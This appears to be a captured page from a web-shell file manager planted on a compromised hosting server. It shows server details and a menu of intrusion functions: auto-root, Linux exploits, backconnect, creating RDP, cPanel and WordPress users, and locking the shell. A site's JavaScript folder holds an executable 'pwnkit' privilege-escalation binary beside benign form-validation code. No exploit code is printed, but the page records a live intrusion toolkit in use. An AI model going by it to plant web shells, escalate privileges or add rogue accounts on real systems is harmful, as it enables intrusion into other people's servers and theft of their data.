Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.32
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
public_html /
consultacpe /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
buscar.js
3.22
KB
-rw-r--r--
envios.js
5.66
KB
-rw-r--r--
jquery-3.3.1.min.js
84.89
KB
-rw-r--r--
jquery.redirect.js
6.38
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
registrar.js
2.61
KB
-rw-r--r--
resultados.js
2.24
KB
-rw-r--r--
semantic.min.js
267.79
KB
-rw-r--r--
sweetalert.min.js
39.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : buscar.js
$(function () { /******************************************************************************/ /* start: valida formulario /******************************************************************************/ $.fn.form.settings.rules.recaptchaValidate = function() { return (recaptchaVerified); }; $('#frmNuevo').form({ keyboardShortcuts: false, fields: { ruc_empresa: { rules: [ { type : 'empty', prompt : 'Complete este campo'}, { type : 'integer', prompt : 'Ingrese solo nĂºmeros'}, { type : 'exactLength[11]', prompt : 'El RUC debe tener {ruleValue} digitos'} ] }, numero_documento: { rules: [ { type : 'empty', prompt : 'Complete este campo'}, { type : 'integer', prompt : 'Ingrese solo nĂºmeros'} ] }, nombre_comprobante: { rules: [ { type : 'empty', prompt : 'Complete este campo'}, ] }, /*recaptcha: { identifier: 'recaptcha', rules: [ {type: 'recaptchaValidate', prompt: 'Por favor seleccione esta opcion'} ] }*/ }, inline : true, }); $('.btn_registrar').on('click', function() { if ($('#frmNuevo').form('is valid')) { sendForm(); } else { $('#frmNuevo').form('validate form'); } }); function sendForm() { var data = $('#frmNuevo').serialize(); $.tzPOST('getComprobante', data, function(resolve){ if(resolve.error){ swal({title: "Error Interno!", text: "Por favor verifique que todo este correcto e intente de nuevo", icon: "error", button: "OK"}); } else{ if (resolve.msg) { swal({title: "No hay resultados", text: "para su busqueda", icon: "warning", button: "OK"}); } else if (resolve.comprobantes.length > 0 ) { $.redirect('resultados.php', {ruc_empresa: $("#ruc_empresa").val(), numero_documento: $("#numero_documento").val(), nombre_comprobante: $("#nombre_comprobante").val()}); } else { swal({title: "No hay resultados", text: "para su busqueda", icon: "warning", button: "OK"}); } } }); return false; }; }); /*********************************************************************************************************/ /* Otras funciones /*********************************************************************************************************/ $.tzPOST = function(action,data,callback){ $.post('php/ajax.php?action='+action,data,callback,'json'); } /** @function * @name upperCase * @description Devuelve un input en mayusculas y mantiene el focus en la posicion indicada * @param {string} El value del input * @return {void} void */ $.upperCase = function (e) { var start = e.selectionStart; var end = e.selectionEnd; e.value = e.value.toUpperCase(); e.setSelectionRange(start, end); }
Close